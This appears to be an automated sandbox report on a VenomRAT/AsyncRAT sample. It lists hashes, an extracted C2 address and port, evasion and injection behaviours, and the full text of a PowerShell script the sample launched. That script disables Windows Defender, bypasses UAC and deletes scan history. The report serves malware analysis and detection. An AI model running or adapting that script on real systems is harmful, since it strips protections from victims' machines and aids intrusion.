Analysis
-
max time kernel
152s -
max time network
185s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
05-12-2022 14:32
Static task
static1
Behavioral task
behavioral1
Sample
6474c38705ed24203c4f2c1386465b97.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
6474c38705ed24203c4f2c1386465b97.exe
Resource
win10v2004-20221111-en
General
-
Target
6474c38705ed24203c4f2c1386465b97.exe
-
Size
1.2MB
-
MD5
6474c38705ed24203c4f2c1386465b97
-
SHA1
afecee20116234fb98d5ce66bb99dd71de43796c
-
SHA256
538f828e062bb8200c9947698aa8d57281fb41df64e29bae5d148fc3b2983c36
-
SHA512
bb3ef85bb1fd87245095aa68503347f3ee4452b871f26b4dd90a100e4d08b0164f96147c4a7f2a50d3c153bc26e162d9edf0bf68a37b1a3cf6b0915ee52a2e05
-
SSDEEP
12288:m7Xw8/7fKSkzJNolKRASwx7IkN24DLbwTDzGPNPbegfKk7ZT1uQOXVtOt5kYgkmI:mP7iqlKDw+m24D0cbDZuQmS5kme
Malware Config
Extracted
asyncrat
VenomRAT+HVNC+Stealer Version:5.0.8
Venom Clients
79.137.207.151:4449
Venom_RAT_HVNC_Mutex_Venom RAT066840
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/1596-64-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat behavioral1/memory/1596-65-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat behavioral1/memory/1596-66-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat behavioral1/memory/1596-67-0x000000000041108E-mapping.dmp asyncrat behavioral1/memory/1596-69-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat behavioral1/memory/1596-71-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat behavioral1/memory/1596-73-0x0000000000A40000-0x0000000000A4E000-memory.dmp asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
6474c38705ed24203c4f2c1386465b97.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions 6474c38705ed24203c4f2c1386465b97.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
6474c38705ed24203c4f2c1386465b97.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools 6474c38705ed24203c4f2c1386465b97.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6474c38705ed24203c4f2c1386465b97.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6474c38705ed24203c4f2c1386465b97.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6474c38705ed24203c4f2c1386465b97.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
6474c38705ed24203c4f2c1386465b97.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 6474c38705ed24203c4f2c1386465b97.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 6474c38705ed24203c4f2c1386465b97.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
6474c38705ed24203c4f2c1386465b97.exedescription pid process target process PID 944 set thread context of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 39 IoCs
Processes:
MSBuild.exepowershell.exepid process 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1712 powershell.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe 1596 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
6474c38705ed24203c4f2c1386465b97.exeMSBuild.exepowershell.exedescription pid process Token: SeDebugPrivilege 944 6474c38705ed24203c4f2c1386465b97.exe Token: SeDebugPrivilege 1596 MSBuild.exe Token: SeDebugPrivilege 1712 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
6474c38705ed24203c4f2c1386465b97.exeMSBuild.exedescription pid process target process PID 944 wrote to memory of 1844 944 6474c38705ed24203c4f2c1386465b97.exe schtasks.exe PID 944 wrote to memory of 1844 944 6474c38705ed24203c4f2c1386465b97.exe schtasks.exe PID 944 wrote to memory of 1844 944 6474c38705ed24203c4f2c1386465b97.exe schtasks.exe PID 944 wrote to memory of 1844 944 6474c38705ed24203c4f2c1386465b97.exe schtasks.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 944 wrote to memory of 1596 944 6474c38705ed24203c4f2c1386465b97.exe MSBuild.exe PID 1596 wrote to memory of 1712 1596 MSBuild.exe powershell.exe PID 1596 wrote to memory of 1712 1596 MSBuild.exe powershell.exe PID 1596 wrote to memory of 1712 1596 MSBuild.exe powershell.exe PID 1596 wrote to memory of 1712 1596 MSBuild.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6474c38705ed24203c4f2c1386465b97.exe"C:\Users\Admin\AppData\Local\Temp\6474c38705ed24203c4f2c1386465b97.exe"1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sZXlqqpkmCl" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA9C8.tmp"2⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"{path}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmpA9C8.tmpFilesize
1KB
MD5d824fa563bb0648cfb4375e7792ed415
SHA1e572dcd2dd305b0f4e5a08db8e8a352b3d8de4d2
SHA25659f06068627d10b1d891b8b19f3455930813ad8cef0a8428bcc28b1100be8c94
SHA512d94ee459f138a30c375eaede8bf09a4ac8e2f0e3eebbb4bbd5074607182e1d541ed6ae469ca93e6aeb7fc4e07588907cadb3bc48e9265ad81fc698d6e95d9caa
-
memory/944-55-0x0000000075B61000-0x0000000075B63000-memory.dmpFilesize
8KB
-
memory/944-56-0x00000000006D0000-0x00000000006E2000-memory.dmpFilesize
72KB
-
memory/944-57-0x00000000057C0000-0x000000000586C000-memory.dmpFilesize
688KB
-
memory/944-58-0x0000000005300000-0x000000000535A000-memory.dmpFilesize
360KB
-
memory/944-54-0x0000000000850000-0x000000000098C000-memory.dmpFilesize
1.2MB
-
memory/1596-62-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-61-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-64-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-65-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-66-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-67-0x000000000041108E-mapping.dmp
-
memory/1596-69-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-71-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1596-73-0x0000000000A40000-0x0000000000A4E000-memory.dmpFilesize
56KB
-
memory/1712-74-0x0000000000000000-mapping.dmp
-
memory/1844-59-0x0000000000000000-mapping.dmp